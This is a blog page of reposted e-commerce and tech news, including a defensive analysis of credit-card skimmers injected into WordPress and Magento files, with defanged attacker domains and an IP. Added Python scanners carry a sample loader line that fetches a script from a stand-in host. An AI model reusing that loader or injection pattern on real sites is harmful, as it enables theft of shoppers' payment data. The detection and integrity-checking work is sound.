
Simplio Labs Blog

“Once we accept our limits, we go beyond them.”

Albert Einstein

Shopify Offering Startup Loans to Merchants – No Sales or Credit Checks Required

Business Advice, E-Commerce, What's New No Comment

Shopify is looking to spur entrepreneurship and boost its merchant count by removing a fundamental barrier to launching a business: startup capital.

The Ottawa-based e-commerce giant announced an expansion of its Shopify Capital program Tuesday that will see the company provide initial loans of $200 to qualifying applicants looking to test out entrepreneurship.

In its most recent earnings report last fall, Shopify highlighted how its existing Shopify Capital program issued $141 million in merchant cash advances and loans in the third quarter of 2019, an increase of 85 per cent year-over-year. Until now, the program’s financing terms have typically been tied to a business’s sales history on the platform.

These early-stage loans, on the other hand, can be approved without any sales or a credit check. In a release, the company positioned the idea as an alternative to dipping into savings, borrowing from friends and family or racking up credit card debt.

Kaz Nejatian, vice-president of Shopify’s financial solutions division, wrote on Twitter that the new program was aimed at entrepreneurs struggling to get started with a business idea, such as recently landed immigrants who haven’t built up a financial foundation yet or a founder targeting non-traditional industries.

The move to ease the on-boarding of new users comes amid a broader push to continue growing the number of merchants using Shopify’s platform.

Though the company passed a sizeable milestone with its one-millionth user in 2019, the company’s year-to-year growth in merchant base has shown signs of slowing in recent years. This has pushed Shopify to increase expansion efforts outside its core North American market; CFO Amy Shapero said during the company’s most recent quarterly earnings call that it was seeing its most rapid growth in international markets.

Shopify itself has been having a strong start to 2020 with its shares hitting new highs on the Toronto and New York stock exchanges. The firm’s shares on the TSX were trading at $576.25 on Tuesday, an increase of nearly nine per cent since the start of the year.

Source: Ottawa Business Journal

Cyber Security Trends 2020 – How Unprepared Are We?

Developers, What's New No Comment

Spending on cybersecurity is rising explosively. When a new ransomware attack occurs every 14 seconds, and infiltration attempts against large volumes of data put millions of people at risk, cybersecurity ought to be discussed. As we enter 2020, the discussion has moved beyond upcoming security products and services to new innovations in hacking. If you haven’t prepared to combat such attacks, you could be the next target.

Before 2019 ends, the US alone will have spent USD 45 billion, and that’s not just any other market cap figure. As per IDC, global spending on cybersecurity will touch USD 103 billion.

Increased Router-based attacks

Positioned at the heart of network operations, routers monitor all the devices and are therefore low-hanging fruit for hackers. Because they aren’t updated as frequently as recommended, routers are prone to a series of attacks. Moreover, the swathe of models from different brands makes it complicated for manufacturers to upgrade or replace older devices.

Such attacks aim to retrieve configuration files by exploiting protocols such as SNMP and SMI. As per a report from Akamai, flaws in UPnP implementations allowed hackers to inject NAT rules, affecting 65,000 routers with 4.8 million more at risk.

Last year, Kaspersky reported a similar attack wherein systems in Russia and Iran were left with an ASCII rendition of the American Flag followed by a message ‘Don’t mess with our elections’.

Given the rise in attacks on routers, users at homes, agencies and offices must take essential steps to ensure basic security. More than just changing the default router password in settings, it’s high time that users act proactively and learn about the security of their routers. They can access the router settings via the default IP 192.168.1.1, which is pre-specified by the router companies.

Enabling WPA2 encryption, updating the router, and using a VPN and other third-party services can help cut the risks by 70%. In certain cases, changing the default IP altogether can curb the vulnerabilities.

Growth of 5G & increasing threats in the cloud

With impressive infrastructure deployments already in progress, 5G is set to grow in major markets such as India. In fact, IoT device manufacturers are experimenting with devices that connect directly to 5G networks and no longer depend on Wi-Fi routers. However, eliminating the central point of network control in homes and small offices has raised fears of making devices prone to more attacks. Routers are helpful in monitoring all the devices in the network, and their absence means screening each one of them manually.

With the abundant data streaming capacity provided by 5G networks, cloud storage may no longer be the most secure option. Given such bandwidth to back up, upload and download huge volumes of data, hackers have already discovered newer targets. At the enterprise level, this gets scarier as migration from on-premises to the cloud continues to grow explosively. However, by 2020, 80% of such deals will attach network firewalls and secure web gateways to cloud-based access security brokers (CASBs).

Increasing use of mobile as an attack vector

By the end of 2018, mobiles had already topped the list of potential gateways for infiltration and hacking attempts. Since all our communications, whether personal or professional, have moved to mobile, we are inching towards a greater risk of unintentionally exposing ourselves to the unknown. As per RSA’s Current State of Cybercrime whitepaper, 70% of fraudulent transactions were triggered by a mobile device in 2018. Not to be missed is the 680% rise in fraud from mobile apps since 2015.

Phishing is back – stronger & scarier

Phishing may be old, yet it is still practiced at full throttle. In fact, it has expanded into different versions such as smishing (phishing through SMS) and vishing (phishing through live calls). As per Verizon’s Data Breach Investigation Report 2019, phishing accounts for 32% of data breaches and 78% of cyberespionage incidents. These actions across emails, SMSs, social media posts and IRS phone calls lure the victim into giving up personal information such as login credentials, or OTPs including transactions. Despite aggressive awareness campaigns, impersonating a reputed brand to extract valuable information from the customer hasn’t stopped, and it doesn’t look like stopping in 2020.

Going forward – hacking will get more innovative

Before you thought of deploying AI to predict attacks, hackers had already implemented strategies to dodge your preparations. Besides using automation for phishing (sending emails and social media messages), attackers could use it to scan millions of systems, identify the most vulnerable ones and launch mass data infiltration attacks. Such abuse of artificial intelligence deserves an equally strong defense: 50% of enterprises pledge to use AI tools to secure their systems.

 

Source: Business2Community

Google plans to give slow websites a new badge of shame in Chrome

What's New No Comment

Google is experimenting with a badge of shame for websites that load slowly in Chrome. “In the future, Chrome may identify sites that typically load fast or slow for users with clear badging,” explains a blog post from the Chrome team. “This may take a number of forms and we plan to experiment with different options, to determine which provides the most value to our users.”

A new badge could appear in the future that’s designed to highlight sites that are “authored in a way that makes them slow generally.” Google will look at historical load latencies to figure out which sites are guilty of slow load times and flag them, and the Chrome team is also exploring identifying sites that will load slowly based on device hardware or network connectivity.

Google is experimenting with having a loading screen (splash screen) to warn Chrome users, or a loading progress bar that would appear green if the site is fast and, presumably, red if it’s slow. “We are building out speed badging in close collaboration with other teams exploring labelling the quality of experiences at Google,” explains the Chrome team. “We are being very mindful with our approach to setting the bar for what is considered a good user experience and hope to land on something that is practically achievable by all developers.”

It’s not clear exactly when this new badging system will appear in Chrome, but Google unveiled its plans at the company’s Chrome Dev Summit in San Francisco today. The company has carefully worded its announcement with lots of “may” hedges, so it’s likely Google is looking for immediate feedback from web developers before it progresses.

Google also unveiled its vision for the future of Chrome today, and it appears the company is focusing on WebAssembly, powerful capabilities, and Progressive Web Apps (PWAs). Hopefully this will mean even more powerful web apps soon, and ones that feel a lot more like native apps.

Source: The Verge

Magento Warns E-Commerce Sites to Upgrade ASAP to Prevent Attacks

E-Commerce, What's New No Comment

The popular e-commerce platform Magento is urging web administrators to install its latest security update in order to defend against malicious attacks in the wild that could exploit a critical remote code-execution vulnerability.

While the company didn’t specify what kinds of potential attacks websites should be concerned about (Threatpost reached out for comment on this), Magento is a common target for the Magecart association of threat groups, which compromise websites built on unpatched e-commerce platforms in order to inject card-skimming scripts on checkout pages. The scripts steal unsuspecting customers’ payment card details and other information entered into the fields on the page.

The vulnerability (CVE-2019-8144), which carries a severity ranking of 10 out of 10 on the CVSS v.3 scale, could enable an unauthenticated user to insert a malicious payload into a merchant’s site through Page Builder template methods, and execute it. Page Builder allows websites to design content updates, preview them live and schedule them to be published. The bug specifically exists in the preview function.

The flaw affects Magento 2.3, and was patched in Magento Commerce 2.3.3 and with the security-only patch 2.3.2-p2, released in October. The company warned that patching will have the side effect of “blocking administrators from viewing previews for products, blocks and dynamic blocks”; but it said it will re-enable the preview functionality as soon as possible.

“We recommend that all merchants, even those who have already upgraded to 2.3.3 or applied security-only patch 2.3.2-p2, review the security of their Magento site to confirm that it was not potentially compromised before upgrade,” Piotr Kaminski of the Magento security team wrote in a posting on Monday. “Applying this hot fix or upgrading…will help defend your store against potential attacks going forward, but will not address the effects of an earlier attack.”

The same update patches several other critical remote-execution flaws with a CVSS v.3 score of 9 and above, as well as cross-site scripting (XSS) issues.

The warning comes as Magecart activity and infrastructure continue to saturate the web. According to analysis from RiskIQ last month, there are now 573 known command-and-control (C2) domains for the group, with close to 10,000 hosts actively loading those domains. In all, RiskIQ has detected almost 2 million (2,086,529) instances of Magecart’s JavaScript binaries, with over 18,000 e-commerce hosts directly breached.

“It is unfortunate that this kind of attack is still succeeding even though a mitigation is quite straightforward,” said Mounir Hahad, head of Juniper Threat Labs at Juniper Networks, via email. “As a last resort, website owners should periodically check the integrity of their script code, which can be as simple as calculating a checksum every few minutes to look for an unexpected change.”
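
One way to implement the periodic checksum comparison Hahad describes, as an added example (not code from Magento or Juniper): hash every script under the web root into a baseline, then report files that changed, appeared or disappeared. The file names and the `hash_scripts`, `compare` and `demo` helpers are hypothetical, and the sample files are constructed.

```python
import hashlib
import tempfile
from pathlib import Path


def hash_scripts(root, pattern="*.js"):
    """Map each script's path (relative to root) to its SHA-256 digest."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob(pattern))
        if p.is_file()
    }


def compare(baseline, current):
    """Report scripts that changed, appeared or vanished since the baseline."""
    return {
        "modified": sorted(
            f for f in baseline if f in current and baseline[f] != current[f]
        ),
        "added": sorted(f for f in current if f not in baseline),
        "removed": sorted(f for f in baseline if f not in current),
    }


def demo():
    """Build a constructed web root, tamper with it, and return the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        web = Path(tmp)
        (web / "js").mkdir()
        (web / "js" / "checkout.js").write_text("function pay(){submit();}\n")
        (web / "js" / "cart.js").write_text("function add(){}\n")

        # Baseline taken right after a known-good deployment.
        baseline = hash_scripts(web)

        # Constructed tampering: a line prepended to an existing script,
        # plus a script that was never part of the deployment.
        target = web / "js" / "checkout.js"
        target.write_text("/* unexpected line */\n" + target.read_text())
        (web / "js" / "stats.js").write_text("/* unexpected file */\n")

        return compare(baseline, hash_scripts(web))


if __name__ == "__main__":
    print(demo())
```

Keep the baseline somewhere the web server cannot write, since anyone able to modify the scripts could otherwise update a manifest stored beside them.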

Credit Skimmers Vulnerability

Developers, E-Commerce, What's New, Wordpress No Comment

We often write about malware that steals payment information from sites built with Magento and other types of e-commerce CMS.

When discussing credit card skimmers like Magecart, it’s sometimes overlooked that WordPress also has a decent share in the ecommerce segment. There are numerous popular plugins that can easily turn a WordPress site into a full-featured online store. In fact, WooCommerce alone has over 5 million installations.

Credit Card Skimmer Injected in WordPress Core

Our friend Salvador Aguilar over at Kinsta recently shared a few samples of malware found in the WordPress core files wp-includes/js/wp-util.min.js and wp-includes/js/admin-bar.min.js.

These JavaScript files both contained the following injected code, found at the very top.

[Image: injected malware found in wp-includes/js/wp-util.min.js and wp-includes/js/admin-bar.min.js]

This injected code is a typical credit card skimmer, with “e.src=atob” containing the encoded URL of the external script. In this case, it is decoded to “hxxps://zendesk-chart[.]com/top/aco.js”.

Common Skimmer Variants Found on Magento

We regularly find these types of injected scripts on Magento sites. They use variations of atob (base64) obfuscation, along with hundreds of different domains and customised URLs.

For example, on one Magento site we found a nearly identical copy of the skimmer script (referenced above), with only a slight variation. This variant loads the skimmer from hxxps://zendesk-chart[.]com/uk/google.js (instead of /top/aco.js), which works with the checkout form for that particular site.
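
A defender-side scanner for this pattern, added here as an example and not taken from the original post: it finds `atob()` string literals in a script, decodes them, and flags any that resolve to a URL on a host outside an allowlist. The sample scripts, the `skimmer.example` and `cdn.shop.example` hosts, and all function names are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# atob("...") or atob('...') called with a base64 string literal.
ATOB_CALL = re.compile(r"""atob\(\s*(["'])([A-Za-z0-9+/=]{8,})\1\s*\)""")


def decode_atob_urls(js_source):
    """Return (offset, url) for each atob() literal that decodes to a URL."""
    hits = []
    for match in ATOB_CALL.finditer(js_source):
        try:
            text = base64.b64decode(match.group(2), validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64-encoded text, so not an encoded URL
        if text.startswith("//"):  # protocol-relative URL
            text = "https:" + text
        parsed = urlparse(text)
        if parsed.scheme in ("http", "https") and parsed.hostname:
            hits.append((match.start(), text))
    return hits


def defang(url):
    """Render a URL in the hxxp / [.] form used for sharing indicators."""
    parsed = urlparse(url)
    scheme = parsed.scheme.replace("http", "hxxp")
    host = parsed.hostname.replace(".", "[.]")
    return f"{scheme}://{host}{parsed.path}"


def flag_external_loaders(js_source, allowed_hosts):
    """List atob()-hidden URLs whose host is not on the site's allowlist."""
    findings = []
    for offset, url in decode_atob_urls(js_source):
        host = urlparse(url).hostname
        if host not in allowed_hosts:
            findings.append({"offset": offset, "host": host, "url": defang(url)})
    return findings


def b64(text):
    """Base64-encode a string the way btoa() would for ASCII input."""
    return base64.b64encode(text.encode()).decode()


# Constructed samples (assumptions, not the code from the infected sites).
ALLOWED = {"cdn.shop.example"}
CLEAN = (
    'window.wp=window.wp||{};var greeting=atob("aGVsbG8gd29ybGQ=");'
    'var lib=atob("%s");' % b64("https://cdn.shop.example/lib.js")
)
INFECTED = (
    'var e=document.createElement("script");e.src=atob("%s");\n'
    % b64("https://skimmer.example/top/aco.js")
) + CLEAN

if __name__ == "__main__":
    for finding in flag_external_loaders(INFECTED, ALLOWED):
        print(finding)
```

Variants that assemble the encoded string at run time will not match the literal pattern, so treat a clean result as inconclusive and keep file-integrity checks in place.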

Domains Used by This Malware Campaign

Zendesk-chart[.]com was created on September 13, 2019, and it is now hosted on 185.254.121.64.

A quick lookup shows that the same server in Russia hosts the following domains:

jquery-web[.]com – Creation Date: 2019-01-21
jquery-stats[.]com – Creation Date: 2019-03-30
tracker-visitors[.]com – Creation Date: 2019-04-19
jquerycodemagento[.]com – Creation Date: 2019-08-11
gooqleadvstat[.]com – Creation Date: 2019-09-13
gooqlemgrteg[.]com – Creation Date: 2019-09-13
zendesk-chart[.]com – Creation Date: 2019-09-13
jquerystatic[.]com – Creation Date: 2019-09-13

All of these domains serve multiple versions of credit card stealers that can be found in the wild injected into various e-commerce sites.


Mitigation Steps

What is evident is that this is definitely not a fully automated mass infection, where hackers have a unified solution (list of vulnerabilities and the payload) that fits all scenarios. Each script has been customized—both name and content—for each specific compromised site.

In this malware campaign, the checkout page URLs are detected for each target. From there, custom code works to collect sensitive credit card information from the victim’s checkout form.

The malware itself is CMS agnostic—it doesn’t matter whether the site is using Magento, WordPress, or any other type of e-commerce CMS. If there is a form that accepts payment details and it can be hacked, nothing prevents the bad actor from installing a skimmer there.

E-commerce website owners should take the security of their websites very seriously, since they are ultimately responsible for any customer data breaches resulting from transactions on their online stores. Extra attention should be paid to the hardening and monitoring of web pages and server resources. Perform regular security scans on your web assets to detect malware and other indicators of compromise.


Shopify expands into email marketing

E-Commerce, What's New No Comment

Shopify continues to expand beyond its core e-commerce platform with a new product called Shopify Email.

Shopify’s chief product officer Craig Miller and director of product for marketing technology Michael Perry gave me a quick demo of the product yesterday; Miller argued that they’ve created “the first email product designed for e-commerce.”

That means it’s integrated with a merchant’s store on Shopify, allowing them to easily pull their brand assets into their emails, along with product content and listings. They can also see whether those emails actually lead customers to add products to their carts or purchase them. And they can create customer segments based on the data in Shopify.

“What we’re really proud of here is, we become the expert for them,” Perry said. “Most people we’ve surveyed don’t understand the value of segmentation, so we’ve taken the liberty of assembling the right list to add value for them.”

Shopify Email is currently available as an early access test for a limited group of merchants, ahead of a broader rollout next year. Miller said it will be free for these initial merchants, with general pricing to be announced later.

Other recent additions to Shopify’s product lineup include hardware for brick-and-mortar stores and digital ad tools.

“The common thread among all of [our new products] is to help brands sell directly to their customers,” Miller said. “There’s been a lot of talk lately about direct-to-consumer, but that’s something we’ve been doing for a decade and a half without calling it that.”

Facebook Unveils New Logo

What's New No Comment

On Monday, Facebook announced a new logo that will be used to represent itself as a parent company and to distinguish it from its apps, including the Facebook app as well as WhatsApp and Instagram.

The new logo was announced through an official blog post alongside a GIF that alternates between different colors representing the different platforms that Facebook owns.

Below is the new logo as it transitions through Facebook, Instagram, and WhatsApp brand colors (blue for Facebook, green for WhatsApp, and purple, red and orange for Instagram).

“People should know which companies make the products they use. Our main services include the Facebook app, Messenger, Instagram, WhatsApp, Oculus, Workplace, Portal, and Calibra.
Today, we’re updating our company branding to be clearer that these products come from Facebook. We’re introducing a new corporate logo and further distinguishing the Facebook company from the Facebook app, which will keep its own branding.”

“The new brand system uses custom typography, rounded corners, open tracking and capitalization to create a visual distinction between the company and the app.” “We designed the new company wordmark with clarity and openness in mind.”

In June, the company started adding the words “from Facebook” across all its apps. Although it seems unnecessary, an alarming number of ‘regular’ users are unaware that Instagram and WhatsApp are owned by Facebook.

Over the coming weeks, Facebook will start using this new branding in its products so you’ll start to see it on things like the login page for Instagram (see photos above).

 

Source: Facebook Newsroom

Rewind Offers Free Holiday Data Backups for E-Commerce Platforms

E-Commerce, What's New No Comment

Rewind, a leading cloud data backup provider for e-commerce and cloud platforms, today announced the launch of Rewind: One-Time, a limited-time, complimentary version of its top-rated data protection software. Helping merchants on Shopify and BigCommerce, Rewind: One-Time can protect and quickly restore a retailer’s online store during the holiday shopping season.

“The holiday season can be an exciting time for merchants, but it can also be quite overwhelming with increased traffic to their stores. We’re excited to welcome the complimentary Rewind: One-Time app to our app store so that merchants can restore their data during the most critical time of the year,” said Fatima Yusuf, Strategic Partnerships Lead, Shopify.

Store uptime is essential for small and medium-sized retailers relying on cloud applications. Rewind has found that online stores have a one in five chance of losing their data at some point in time. Data disasters can happen from malicious acts, third-party integrations, or human error. Available now through December 31, 2019, Rewind: One-Time allows retailers to conduct a free, one-time backup of up to 10,000 products and related data tied to their e-commerce storefront so they can limit any downtime due to data issues.

“Data loss and the resulting downtime can be devastating to an ecommerce business. The Rewind for BigCommerce solution gives BigCommerce sellers the security they need to focus on growing their business — not recovering lost data. We’re pleased to be able to offer Rewind’s excellent integration and world-class customer support to our customers,” said MaryAnn Bekkedahl, SVP of Global Business Development, BigCommerce.

As minutes matter, retailers who take advantage of Rewind: One-Time will be able to restore their data to the exact day/time they installed. The one-time backup for BigCommerce includes product, brand, category, option set, and option data, while the one-time Shopify backup includes products, product images, custom collections and smart collections. The backups will be stored indefinitely in the secure Rewind Vault™.

“We want to ensure every BigCommerce and Shopify merchant knows their store data is fully protected this season so they can focus on generating sales, especially on peak days like Black Friday, Small Business Saturday and Cyber Monday,” said Mike Potter, CEO of Rewind. “With account-level data protection from Rewind: One-Time, retailers can ring in holiday sales rather than spend hours trying to recover deleted products or repair broken links and pages.”

Rewind: One-Time users can upgrade to one of the paid plan options at any time during the holiday season or beyond. Paid Rewind subscriptions add the ability for merchants to take advantage of ongoing, comprehensive backups so they can painlessly restore their full store experience (or select products, images, etc.) to any chosen date/time.

Download Rewind: One-Time

Adobe Introduces New Commerce Features For Magento

E-Commerce, What's New No Comment

Adobe is rolling out new capabilities to its enterprise eCommerce platform Magento that are targeted to small to medium-size businesses (SMBs) and mid-market merchants, Adobe said in a press release on Monday (Oct. 22).

Adobe is unveiling these latest features at MagentoLive Europe 2019, being held in Amsterdam Oct. 22-23. The improvements to the commerce platform aim to improve customers’ shopping experience.

“We’re now at an inflection point where companies of all sizes are perpetually challenged by soaring customer expectations to deliver amazing brand experiences. We’re committed to bringing Adobe’s enterprise-grade commerce capabilities to our SMB and mid-market customers to help them grow their business,” Adobe said in the release.

The release of Magento 2.3.3 includes performance and security enhancements to help merchants stay compliant with new regulations. Enhanced features also include integrating with Adobe Stock, an Amazon sales channel for the U.K., cloud infrastructure with Microsoft and an Adobe Sensei-powered product suggestion tool.

“We’re bolstering our multi-cloud capability by making Magento Commerce available on both Microsoft Azure and Amazon Web Services,” the release said.

The “highly anticipated” Adobe Stock integration with Magento offers a searchable interface to find, preview and embed art, such as photos and videos. Adobe Stock has over 130 million images, templates, 3D assets, stock videos and premium collection images.

Adobe acquired Magento’s cloud-based eCommerce platform last year for $1.68 billion. A Shopify competitor, it counts Coca-Cola, Warner Brothers Music, Canon and Nestle as customers.

Commerce Cloud was launched by Adobe in March. This fully managed cloud-based version of the Magento platform is fully integrated with benchmark Adobe tools like analytics, marketing and advertising. Amazon and Google integrations were also added.

On Amazon, merchants can automatically manage their inventory directly from the Magento platform. Users can set pricing rules for the Amazon sales channel, handle multiple brands at a time with access to multiple accounts, and get access to Amazon product data.

Magento also introduced a free native integration with Google Shopping that will let Magento admins manage Google ads from the Magento dashboard, as well as Google Merchant Center accounts.

YouTube Is Making It Hard for Copyright Holders to Make Unfair Claims Against Creators

Uncategorized, What's New No Comment

YouTube found that most copyright holders are using unfair means to take revenue away from creators. The news first appeared on Search Engine Journal.

For most people, YouTube’s copyright system is a mess, as it places the burden on creators to dispute copyright claims; in turn, copyright holders use the manual claiming tool to seize revenue from videos, often before the YouTuber (creator) gets a chance to respond.

Now, following continuous requests from content creators, YouTube is updating this tool so that creators do not face any loss. The change will take place in mid-September, and YouTube will make it by changing its Content ID policy; YouTube says in its blog post that doing so will cut down many copyright claims. In other words, rights holders will not be able to seize money from YouTube videos by filing a claim, especially when the video is registered in someone’s name and appears for a small period of time on the channel or appears in the background of a certain video.

YouTube has now made it mandatory for people filing copyright infringement claims to provide a timestamp for the exact part of the video or videos they are reporting. The company also states that it will revoke a user’s access to manual claims if they continuously fail to provide accurate manual timestamps. An advantage of timestamps is that the recipient of a manual claim will see the timestamp indicated by the other party or parties, which will make it easy to find out which part of the video needs to be edited.

To resolve a claim, creators can either dispute it or alter the video using YouTube’s updated editing tools. Alternatively, creators can mute or remove all sounds, or swap them out easily with one of the platform’s free-to-use songs from its audio library.

YouTube scans video uploads against a database of files to find audio and video matches through its Content ID technology. Any copyright infringement found automatically leads to automated Content ID claims (Content ID is the video platform’s system that detects when an upload uses another person’s intellectual property; the rights holder can then earn from it as well).

YouTube believes that doing so will stop many of the continuous breaches of the manual claiming privileges held by labels or other rights holders.

The changes made by the company will only affect manual claims and will have no impact on music found automatically by YouTube’s Content ID system. The company states that since it was implemented it has cleared many claims and has paid rights holders $3 billion, a very large amount.

The company states that they will continuously design ways to improve the creator’s copyright experience without altering the rights of the copyright owners.